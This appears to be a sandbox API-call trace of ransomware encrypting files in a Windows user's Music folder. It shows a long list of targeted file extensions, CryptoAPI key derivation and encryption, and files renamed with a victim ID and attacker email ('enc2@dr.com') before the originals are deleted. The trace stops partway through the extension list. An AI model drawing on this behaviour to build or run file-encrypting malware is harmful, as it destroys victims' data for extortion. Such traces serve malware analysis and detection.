	[0193.189] RtlMoveMemory (in: Destination=0xfeb568, Source=0xfdd180, Length=0xe3dc | out: Destination=0xfeb568) 
	[0193.189] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.190] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeb568*, pdwDataLen=0x18a1ec*=0xe3dc, dwBufLen=0xe3e0 | out: pbData=0xfeb568*, pdwDataLen=0x18a1ec*=0xe3e0) returned 1
	[0193.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.257] CryptDestroyKey (hKey=0xfb9470) returned 1
	[0193.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.258] CryptDestroyHash (hHash=0xfb92f0) returned 1
	[0193.258] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.258] CryptReleaseContext (hProv=0xfcb7f8, dwFlags=0x0) returned 1
	[0193.258] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0193.258] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0193.259] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.259] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0193.260] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 115
	[0193.261] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0193.261] WriteFile (in: hFile=0x390, lpBuffer=0xfeb568*, nNumberOfBytesToWrite=0xe3e0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfeb568*, lpNumberOfBytesWritten=0x18a648*=0xe3e0, lpOverlapped=0x0) returned 1
	[0193.267] CloseHandle (hObject=0x390) returned 1
	[0193.267] CloseHandle (hObject=0x388) returned 1
	[0193.267] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav")) returned 1
	[0193.277] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav")) returned 0
	[0193.278] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf097c070, ftCreationTime.dwHighDateTime=0x1d96772, ftLastAccessTime.dwLowDateTime=0x4b844500, ftLastAccessTime.dwHighDateTime=0x1d97004, ftLastWriteTime.dwLowDateTime=0x4b844500, ftLastWriteTime.dwHighDateTime=0x1d97004, nFileSizeHigh=0x0, nFileSizeLow=0x10938, dwReserved0=0x0, dwReserved1=0x0, cFileName="qCNFJxG4t34HEhXGGp.mp3", cAlternateFileName="QCNFJX~1.MP3")) returned 1
	[0193.278] lstrcmpW (lpString1="qCNFJxG4t34HEhXGGp.mp3", lpString2="..") returned 1
	[0193.278] lstrcmpW (lpString1="qCNFJxG4t34HEhXGGp.mp3", lpString2=".") returned 1
	[0193.278] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\"
	[0193.278] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\", lpString2="qCNFJxG4t34HEhXGGp.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\qCNFJxG4t34HEhXGGp.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\qCNFJxG4t34HEhXGGp.mp3"
	[0193.278] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\qCNFJxG4t34HEhXGGp.mp3") returned 86
	[0193.278] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0193.279] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\qCNFJxG4t34HEhXGGp.mp3", cchLength=0x56 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3") returned 0x56
	[0193.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.279] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0193.279] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3"
	[0193.279] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3") returned 86
	[0193.279] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0193.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.280] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0193.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.280] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0193.280] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0193.281] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0193.281] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0193.286] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x10938, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x10938, lpOverlapped=0x0) returned 1
	[0193.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.291] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0193.293] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.293] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0193.293] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.293] CryptHashData (hHash=0xfb8fb0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0193.294] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.294] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb8fb0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb93f0) returned 1
	[0193.294] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.294] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10938, dwBufLen=0x10938 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x10940) returned 1
	[0193.296] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0193.296] RtlMoveMemory (in: Destination=0xfedac0, Source=0xfdd180, Length=0x10938 | out: Destination=0xfedac0) 
	[0193.296] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.296] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfedac0*, pdwDataLen=0x18a1ec*=0x10938, dwBufLen=0x10940 | out: pbData=0xfedac0*, pdwDataLen=0x18a1ec*=0x10940) returned 1
	[0193.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.299] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0194.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.190] CryptDestroyHash (hHash=0xfb8fb0) returned 1
	[0194.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.190] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0194.190] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.191] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.191] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0194.192] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 128
	[0194.192] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0194.193] WriteFile (in: hFile=0x390, lpBuffer=0xfedac0*, nNumberOfBytesToWrite=0x10940, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfedac0*, lpNumberOfBytesWritten=0x18a648*=0x10940, lpOverlapped=0x0) returned 1
	[0194.198] CloseHandle (hObject=0x390) returned 1
	[0194.198] CloseHandle (hObject=0x388) returned 1
	[0194.199] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3")) returned 1
	[0194.207] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\qcnfjxg4t34hehxggp.mp3")) returned 0
	[0194.207] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3deca70, ftCreationTime.dwHighDateTime=0x1d9726f, ftLastAccessTime.dwLowDateTime=0xcfd02cb0, ftLastAccessTime.dwHighDateTime=0x1d97343, ftLastWriteTime.dwLowDateTime=0xcfd02cb0, ftLastWriteTime.dwHighDateTime=0x1d97343, nFileSizeHigh=0x0, nFileSizeLow=0x166d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="sArxNZ6aVb1lKhE2u.m4a", cAlternateFileName="SARXNZ~1.M4A")) returned 1
	[0194.207] lstrcmpW (lpString1="sArxNZ6aVb1lKhE2u.m4a", lpString2="..") returned 1
	[0194.207] lstrcmpW (lpString1="sArxNZ6aVb1lKhE2u.m4a", lpString2=".") returned 1
	[0194.207] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\"
	[0194.207] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\", lpString2="sArxNZ6aVb1lKhE2u.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\sArxNZ6aVb1lKhE2u.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\sArxNZ6aVb1lKhE2u.m4a"
	[0194.208] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\sArxNZ6aVb1lKhE2u.m4a") returned 85
	[0194.208] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0194.208] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\sArxNZ6aVb1lKhE2u.m4a", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a") returned 0x55
	[0194.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.208] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0194.208] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a"
	[0194.208] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a") returned 85
	[0194.208] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.209] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0194.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.209] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb